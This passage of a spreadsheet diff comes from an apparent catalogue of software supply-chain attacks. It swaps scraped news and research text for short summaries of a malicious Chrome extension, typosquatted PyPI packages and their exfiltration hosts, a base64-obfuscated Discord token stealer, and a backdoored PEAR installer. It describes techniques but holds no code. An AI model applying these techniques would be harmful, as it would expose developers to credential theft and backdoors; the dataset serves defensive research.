zdnet recommends newsletters videos editorial guidelines tech home tech cyberespionage group uses chrome extension infect victims suspected north korean uses google chrome extension infect victims academic sector written catalin cimpanu contributor appears first cyberespionage scene nationstatebacked hacking group used google chrome extension infect victims steal passwords cookies browsers first time advanced persistent industry term nationstate hacking groups seen abusing chrome extension albeit first time used browser extension russianlinked turla previously used firefox addon according report thats going published later today asert team netscout reveals details spearphishing campaign thats pushing malicious chrome extension since least hackers used spearphishing emails lure victims websites copied legitimate academic organizations phishing sites showed benign document prevented users viewing redirecting victims official chrome store page install removed chrome extension named auto font manager image j0hn d0ugh netscout researchers extension ability steal cookies site passwords theyve also seen email forwarding compromised accounts speaking zdnet netscout researchers said spearphishing campaigns using chrome extension targeted academic sector want give names victims weve identified three universities based united states nonprofit institution based asia certain targeted researchers told large number victims across multiple universities expertise biomedical engineering possibly suggesting motivation attackers targeting researchers added separately report need antivirus linux ways protect getting scammed online phone best free trials habits highly secure remote workers find remove spyware phone looking recent attacks researchers also discovered infrastructure hosted phishing sites also previously used another hacking campaign relied breaking universities networks remote desktop connections connections netscout told zdnet separate threads activity shared infrastructure overlapping victims unclear came first investigators also added people behind recent campaign netscout named stolen pencil sloppy came hiding tracks researchers said found evidence suggesting group based north korea poor opsec users finding open browsers korean englishtokorean translators open keyboards switched korean language settings researchers said netscout researchers didnt want link campaign specific north korean advanced persistent industry term nationstate hacking groups multiple industry sources zdnet showed chrome extension file hashes yesterday pointed cyberespionage group known kimsuky also known velvet chollima kaspersky report presented evidence linking group north koreas regime report also detailed kimsukys propensity going academic targets ones targeted recent campaign hackers netscout researchers told zdnet theyve seen evidence data theft like intrusion cant entirely discount possibility none tools commands specifically geared towards stealing information focused credential theft maintaining access universities always attractive target nationstate hackers especially looking proprietary information unreleased research chinese russia state hackers known academic sector regular basis iranian hackers active bunch earlier year march indicted iranians hacks universities countries research papers hackers stole eventually published online payforaccess portals operated indicted hackers apparently found generate side profits daytoday statesponsored hacking campaigns indictments didnt stop iranian hackers attacks though coverage czech republic blames russia multiple government network hacks ukrainian police arrest hacker infected users darkcomet industrial espionage campaign leverages autocadbased malware coap protocol next thing ddos attacks atlanta ransomware attack mission critical systems cnet dismantles gigantic fraud scheme operating across million hackers opening ports routers infect malware banking trojans ransomware biggest techrepublic editorial standards show comments comment community guidelines related google chrome better protects risky websites weak passwords google launched faster efficient chrome browser windows theres catch surge protector wall charger amazons spring sale zdnet equip harness power disruptive innovation work home topics galleries videos sell share personal information zdnet meet team sitemap reprint policy join newsletters site assistance licensing zdnet ventures company rights reserved privacy policy cookie settings advertise terms</t>
+          <t>Auto Font Manager malicious Chrome extension APT</t>
         </is>
       </c>
       <c r="D91" t="inlineStr">
         <is>
           <t>https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims</t>
-        </is>
-      </c>
-      <c r="E91" t="inlineStr">
-        <is>
-          <t>['apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'tomorrow', 'embrace', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'home', 'tech', 'cyberespionage', 'group', 'chrome', 'extension', 'infect', 'victim', 'extension', 'infect', 'victim', 'academic', 'sector', 'contributor', 'first', 'cyberespionage', 'scene', 'hacking', 'group', 'chrome', 'extension', 'infect', 'victim', 'password', 'cookie', 'browser', 'first', 'time', 'advanced', 'persistent', 'industry', 'term', 'nationstate', 'hacking', 'group', 'chrome', 'extension', 'first', 'time', 'browser', 'extension', 'report', 'today', 'asert', 'team', 'netscout', 'detail', 'campaign', 'malicious', 'chrome', 'extension', 'least', 'hacker', 'email', 'victim', 'website', 'legitimate', 'academic', 'organization', 'site', 'benign', 'document', 'user', 'victim', 'official', 'chrome', 'store', 'page', 'install', 'chrome', 'extension', 'auto', 'font', 'manager', 'netscout', 'researcher', 'extension', 'ability', 'cookie', 'site', 'password', 'email', 'forwarding', 'account', 'zdnet', 'netscout', 'researcher', 'campaign', 'chrome', 'extension', 'academic', 'sector', 'name', 'victim', 'university', 'institution', 'researcher', 'large', 'number', 'victim', 'multiple', 'university', 'biomedical', 'engineering', 'motivation', 'attacker', 'researcher', 'report', 'way', 'scammed', 'online', 'phone', 'good', 'free', 'trial', 'habit', 'secure', 'remote', 'worker', 'spyware', 'phone', 'recent', 'attack', 'researcher', 'infrastructure', 'phishing', 'site', 'hacking', 'campaign', 'university', 'network', 'remote', 'desktop', 'connection', 'connection', 'separate', 'thread', 'activity', 'infrastructure', 'victim', 'unclear', 'investigator', 'people', 'recent', 'campaign', 'netscout', 'pencil', 'sloppy', 'hiding', 'track', 'researcher', 'evidence', 'group', 'user', 'open', 'browser', 'translator', 'open', 'keyboard', 'korean', 'language', 'setting', 'researcher', 'researcher', 'link', 'campaign', 'specific', 'north', 'korean', 'advanced', 'persistent', 'industry', 'term', 'nationstate', 'hacking', 'group', 'multiple', 'industry', 'source', 'chrome', 'extension', 'file', 'hash', 'yesterday', 'group', 'velvet', 'report', 'evidence', 'group', 'regime', 'report', 'kimsukys', 'propensity', 'academic', 'target', 'one', 'recent', 'campaign', 'hacker', 'netscout', 'researcher', 'zdnet', 'evidence', 'datum', 'theft', 'intrusion', 'possibility', 'none', 'tool', 'information', 'credential', 'theft', 'access', 'university', 'attractive', 'target', 'nationstate', 'hacker', 'proprietary', 'information', 'research', 'chinese', 'state', 'hacker', 'academic', 'sector', 'regular', 'basis', 'iranian', 'hacker', 'active', 'bunch', 'early', 'year', 'university', 'country', 'research', 'paper', 'hacker', 'online', 'payforaccess', 'portal', 'hacker', 'side', 'profit', 'daytoday', 'hacking', 'campaign', 'indictment', 'iranian', 'hacker', 'attack', 'coverage', 'czech', 'republic', 'multiple', 'government', 'network', 'ukrainian', 'police', 'arrest', 'hacker', 'user', 'darkcomet', 'industrial', 'espionage', 'campaign', 'next', 'thing', 'attack', 'mission', 'critical', 'system', 'cnet', 'gigantic', 'fraud', 'scheme', 'hacker', 'port', 'router', 'malware', 'banking', 'trojan', 'ransomware', 'big', 'techrepublic', 'editorial', 'standard', 'comment', 'comment', 'community', 'guideline', 'risky', 'website', 'weak', 'password', 'efficient', 'chrome', 'browser', 'window', 'catch', 'surge', 'protector', 'wall', 'sale', 'harness', 'power', 'disruptive', 'innovation', 'work', 'home', 'topic', 'gallery', 'video', 'share', 'personal', 'information', 'meet', 'team', 'sitemap', 'reprint', 'policy', 'join', 'site', 'assistance', 'company', 'right', 'privacy', 'policy', 'cookie', 'setting', 'term']</t>
         </is>
       </c>
     </row>
@@ -2818,17 +2459,12 @@
       </c>
       <c r="C92" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rscdev pypimalware public notifications fork star pypi malware packages license unlicense license stars forks branches tags activity star notifications code issues pull requests actions projects insights additional navigation options code issues pull requests actions projects insights rscdevpypimalware commit belong branch repository belong fork outside repository master branches tags file code folders files name name last commit message last commit date latest commit history commits malware malware license license readmemd readmemd view files repository files navigation readme unlicense license pypi malware info pypi well known python packages repository everyone upload modules pypi without checks audits legacy package format based distutils module requires setuppy script script local machine package installed verify freeze grep distribdjangaeasyinstalljunkeldatlibpeshkamumpymybiubiubiunmappythonopenvcpythonftppythonkafkapythonmongopythonmysqlpythonmysqldbpythonopensslpythonsqlitesmbvirtualnv secure wheels always double check package name rootadmin hashchecking mode malware packages package versions remote host info distrib distrib01 packagemancomlucom sends hostname environment variables remote host djanga djanga01 linux malware downloads executable adds bashrc djanga02 djanga03 easyinstall easyinstall3700 linux malware downloads executable adds bashrc easyinstall3900 easyinstall3910 easyinstall4000 easyinstall4100 easyinstall4200 junkeldat junkeldat10 wwwdl01pwnzorg seems broken libpeshka libpeshka02 linux malware downloads executable adds bashrc libpeshka03 libpeshka04 libpeshka05 libpeshka06 mumpy mumpy01 packagemancomlucom sends hostname environment variables remote host mybiubiubiu mybiubiubiu010 httpsnowtycn uploads data username hostname remote host mybiubiubiu011 mybiubiubiu012 mybiubiubiu013 mybiubiubiu014 mybiubiubiu016 nmappython nmappython061 httpopenvcorg uploads data username hostname remote host openvc openvc100 httpopenvcorg uploads data username hostname remote host pythonftp pythonftp24 httpusdslabpw uploads username hostname remote host pythonkafka pythonkafka135 httpusdslabpw uploads username hostname remote host pythonmongo pythonmongo020 httpusdslabpw uploads username hostname remote host pythonmysql pythonmysql100 httpmysqlopenvcorg uploads username hostname remote host pythonmysqldb pythonmysqldb24 httpusdslabpw uploads username hostname remote host pythonopenssl pythonopenssl01 httpopenvcorg uploads username hostname remote host pythonsqlite pythonsqlite24 httpusdslabpw uploads username hostname remote host smb24 httpusdslabpw uploads username hostname remote host virtualnv virtualnv011 packagemancomlucom sends hostname environment variables remote host pypi malware packages topics malwareresearch pypipackages resources readme license unlicense license activity stars stars watchers watching forks forks report repository releases releases published packages packages published languages python html makefile footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>9 instances of typosquatting attacks that collect and exfiltrate host information were identified.</t>
         </is>
       </c>
       <c r="D92" t="inlineStr">
         <is>
           <t>https://github.com/rsc-dev/pypi_malware</t>
-        </is>
-      </c>
-      <c r="E92" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rscdev', 'pypimalware', 'public', 'notification', 'license', 'unlicense', 'license', 'star', 'branch', 'tag', 'activity', 'star', 'notification', 'code', 'issue', 'request', 'action', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'insight', 'rscdevpypimalware', 'branch', 'repository', 'fork', 'repository', 'master', 'branch', 'tag', 'code', 'folder', 'name', 'name', 'last', 'commit', 'message', 'last', 'commit', 'date', 'late', 'history', 'license', 'license', 'readmemd', 'readmemd', 'view', 'repository', 'file', 'navigation', 'readme', 'license', 'python', 'package', 'module', 'pypi', 'check', 'audits', 'legacy', 'package', 'format', 'distutil', 'module', 'setuppy', 'script', 'script', 'local', 'machine', 'package', 'verify', 'secure', 'wheel', 'double', 'check', 'package', 'name', 'rootadmin', 'mode', 'malware', 'package', 'package', 'version', 'remote', 'host', 'hostname', 'environment', 'variable', 'remote', 'host', 'djanga03', 'easyinstall', 'easyinstall3900', 'easyinstall3910', 'junkeldat', 'hostname', 'environment', 'variable', 'remote', 'username', 'hostname', 'remote', 'username', 'hostname', 'remote', 'host', 'username', 'hostname', 'remote', 'host', 'username', 'hostname', 'remote', 'host', 'username', 'hostname', 'remote', 'username', 'hostname', 'remote', 'host', 'username', 'hostname', 'remote', 'username', 'hostname', 'remote', 'host', 'remote', 'host', 'pythonsqlite', 'pythonsqlite24', 'httpusdslabpw', 'username', 'hostname', 'remote', 'host', 'username', 'packagemancomlucom', 'hostname', 'environment', 'variable', 'remote', 'host', 'topic', 'malwareresearch', 'pypipackage', 'resource', 'license', 'unlicense', 'license', 'activity', 'star', 'watcher', 'fork', 'fork', 'repository', 'release', 'release', 'package', 'package', 'language', 'python', 'html', 'footer', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -2843,15 +2479,14 @@
           <t>Apple App Store</t>
         </is>
       </c>
-      <c r="C93" t="inlineStr"/>
+      <c r="C93" t="inlineStr">
+        <is>
+          <t>14 games were available on the App Store that included an additional implant.</t>
+        </is>
+      </c>
       <c r="D93" t="inlineStr">
         <is>
           <t>https://www.wandera.com/risky-apps/</t>
-        </is>
-      </c>
-      <c r="E93" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2866,15 +2501,14 @@
           <t>Adverline JavaScript</t>
         </is>
       </c>
-      <c r="C94" t="inlineStr"/>
+      <c r="C94" t="inlineStr">
+        <is>
+          <t>MageCart malware injected into French ad agency Adverline</t>
+        </is>
+      </c>
       <c r="D94" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/magecart-skimmer-hits-hundreds-of-sites-in-ad-supply-chain-attack</t>
-        </is>
-      </c>
-      <c r="E94" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2891,17 +2525,12 @@
       </c>
       <c r="C95" t="inlineStr">
         <is>
-          <t>open sign sign write sign sign discord token stealer discovered pypi repository bertus follow read listen share months since last posts regarding malicious code pypi repository made improvements static code analysis tool detecting cyber attacks pypi background part effort recently rescanned pypi repository found analyzing data scan discovered interesting pypi package named ‘pytz3dev’ package “typosquatting” popular pypi package named ‘pytz’ adding number package name maybe indicate imply version also using ubuntu package management convention adding ‘dev’ package name indicate development resources original package convention used python someone could mistakenly install package instead ‘pytz’ original ‘pytz’ package used python library various timezone operations working times dates author ‘pytz3dev’ package seems taken content ‘pytz’ package republished ‘pytz3dev’ additional malicious code malicious pypi packages i’ve analyzed added malicious code setuppy file runs installation pypi package however case malicious code added init file main code base every time python module imported malicious code seems search sqlite database file used discord chat application installed windows system discord uses sqlite database storing user configuration application sqlite database also includes token used discord application authenticate user malicious code attempts extract token database file manually searching data file without using sqlite lack sqlite usage probably makes easier deploy malicious code since requirements sqlite libraries installed target system discord token found sent server details pytz3dev package ‘pytz3dev’ package pypi since september 17th author seems copied ‘pytz’ package code added malicious code finds discord application’s data folder windows machines attempts extract discord token sqlite database file according pypistatsorg package downloaded times last month package reported malicious pypi administrators pytz3dev downloads last days image pypistatsorg recommendations uninstall ‘pytz3dev’ package installed system reset discord token possible detailed analysis malicious code malicious code shown added pytz3 init file ‘timezone’ function malicious code obfuscated using base64 encoding obfuscated malicious code pytz3dev malicious code uses base64 library decode obfuscated code executes decoded code shown ‘osgetenv“appdata”’ indicates malicious code targeting microsoft windows systems discord token extracted sent heroku application server base64 decoded malicious code python pytz pypi typosquatting follow written bertus followers software engineering follow help status careers blog privacy terms text speech teams</t>
+          <t>The pytz3-dev package is typo-squatting the popular PyPI package named pytz.  The pytz3-dev package contains malicious code that searches for a Discord authentication token stored in a SQLite database, and exfiltrates the token if one is found.</t>
         </is>
       </c>
       <c r="D95" t="inlineStr">
         <is>
           <t>https://medium.com/@bertusk/discord-token-stealer-discovered-in-pypi-repository-e65ed9c3de06</t>
-        </is>
-      </c>
-      <c r="E95" t="inlineStr">
-        <is>
-          <t>['open', 'sign', 'sign', 'sign', 'sign', 'discord', 'listen', 'share', 'month', 'last', 'post', 'malicious', 'code', 'improvement', 'static', 'code', 'analysis', 'tool', 'cyber', 'part', 'effort', 'datum', 'interesting', 'pypi', 'package', 'pytz3dev', 'package', 'popular', 'pypi', 'package', 'pytz', 'number', 'package', 'name', 'version', 'package', 'management', 'dev', 'package', 'name', 'development', 'resource', 'original', 'package', 'convention', 'package', 'pytz', 'original', 'pytz', 'package', 'library', 'various', 'timezone', 'operation', 'time', 'author', 'pytz3dev', 'package', 'content', 'pytz', 'package', 'pytz3dev', 'additional', 'malicious', 'code', 'malicious', 'pypi', 'package', 'malicious', 'code', 'setuppy', 'file', 'installation', 'pypi', 'case', 'malicious', 'code', 'init', 'main', 'code', 'base', 'time', 'python', 'module', 'malicious', 'code', 'search', 'sqlite', 'database', 'file', 'discord', 'chat', 'application', 'window', 'system', 'discord', 'sqlite', 'database', 'user', 'configuration', 'application', 'sqlite', 'database', 'discord', 'application', 'authenticate', 'user', 'malicious', 'code', 'attempt', 'token', 'database', 'file', 'datum', 'file', 'sqlite', 'lack', 'sqlite', 'usage', 'easy', 'malicious', 'code', 'requirement', 'sqlite', 'library', 'target', 'system', 'discord', 'server', 'detail', 'pytz3dev', 'package', 'pytz3dev', 'package', 'pypi', '17th', 'author', 'pytz', 'package', 'code', 'malicious', 'code', 'discord', 'application', 'datum', 'folder', 'window', 'machine', 'discord', 'token', 'sqlite', 'database', 'file', 'time', 'last', 'month', 'package', 'malicious', 'administrator', 'pytz3dev', 'download', 'last', 'day', 'image', 'pypistatsorg', 'recommendation', 'package', 'system', 'reset', 'discord', 'token', 'possible', 'detailed', 'analysis', 'malicious', 'code', 'malicious', 'code', 'pytz3', 'init', 'file', 'timezone', 'function', 'malicious', 'code', 'base64', 'malicious', 'code', 'pytz3dev', 'malicious', 'code', 'base64', 'code', 'code', 'osgetenv“appdata', 'malicious', 'code', 'system', 'heroku', 'application', 'server', 'base64', 'malicious', 'code', 'python', 'pytz', 'follow', 'software', 'engineering', 'follow', 'help', 'status', 'career', 'blog', 'privacy', 'term', 'text', 'speech', 'team']</t>
         </is>
       </c>
     </row>
@@ -2918,17 +2547,12 @@
       </c>
       <c r="C96" t="inlineStr">
         <is>
-          <t>trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons tomorrow belongs embrace today asia australia europe india united kingdom united states zdnet france zdnet germany zdnet korea zdnet japan popular topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines tech home tech mystery still surrounds hack pear website three days later still details official website hosted backdoored version pear package manager past months written catalin cimpanu contributor image pear team details remain foggy recent breach pear website crucial lesserknown part ecosystem need antivirus linux ways protect getting scammed online phone best free trials habits highly secure remote workers find remove spyware phone pear stands extension application repository first package manager developed scripting language back 1990s works allowing developers load reuse code common functions delivered libraries currently developers switched using composer newer thirdparty package manager pear still remains popular still widespread also included default official binaries linux developers pear version ships distribution also download updated pear gopearphar version pear website also hosts pearcompatible libraries however last week pear website located pearphpnet taken homepage replaced short message announcing breach according message pear team said theyve found official website hosting tainted gopearphar file main pear executable downloaded gopearphar past months copy release version github pearpearwebphars compare file hashes said message official website different infected file image zdnet according virustotal scan tainted gopearphar file malicious version made available official pear website appears contain antivirus vendors describing backdoor exactly backdoor currently unknown pear team still analyzing files source code contains thousands line code servers administrators installed update pear executable gopearphar downloaded pear website considered compromised treated accordingly pear team says still auditing rebuilding website looking hole attackers exploited months plant backdoored gopearphar file first place pear developers promised detailed incident postmortem operation concludes meantime earlier today pear team also released pear v11010 pear release identical previous release v1109 pear team uploaded github give timestamp signal clean version webmasters install without fear downloading potentially backdoored release currently powers nearly percent internet sites small portion likely affected incident people either composer rarely update pear executable first place update january series tweets following publication article pear team published details recent breach tweets embedded know tainted gopearphar file reported paranoids fire team last release file done taint occurred taint verified pear pear january know taint embedded line designed spawn reverse shell perl reported host relation taint pear pear january know breach identified installpearnozlibphar gopearphar file github could used good md5sum comparison suspect copies pear pear january know unsure potential insecurities took site order restore backups previous mirror host pear single info page meantime pear pear january know cast wide asking everyone concerned theyd used gopearphar file past months server restoral ongoing limited staff timezone differences parties involved pear pear january addition team dcso also analyzed malicious backdoor confirmed findings pear team drops reverse shell infected hosts allowing attackers connect servers running tainted pear package wordpress heres tour features coverage implementations impacted 36yearsold flaws temporary available windows zerodays released december online stores governments multinationals hacked flaw websites steal browser data extensions apis researchers take malware sites last months popular wordpress plugin hacked angry former employee apple host free coding lessons european stores cnet around internet sites unsupported version weeks techrepublic editorial standards show comments comment community guidelines related everything need know microsoft exchange server hack engine review solid managedhosting provider wordpress best wordpress hosting services zdnet equip harness power disruptive innovation work home topics galleries videos sell share personal information zdnet meet team sitemap reprint policy join newsletters site assistance licensing zdnet ventures company rights reserved privacy policy cookie settings advertise terms</t>
+          <t>Malicious PEAR (PHP package manager) executable was uploaded to official PHP PEAR website</t>
         </is>
       </c>
       <c r="D96" t="inlineStr">
         <is>
           <t>https://www.zdnet.com/article/mystery-still-surrounds-hack-of-php-pear-website/</t>
-        </is>
-      </c>
-      <c r="E96" t="inlineStr">
-        <is>
-          <t>['apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'tomorrow', 'embrace', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 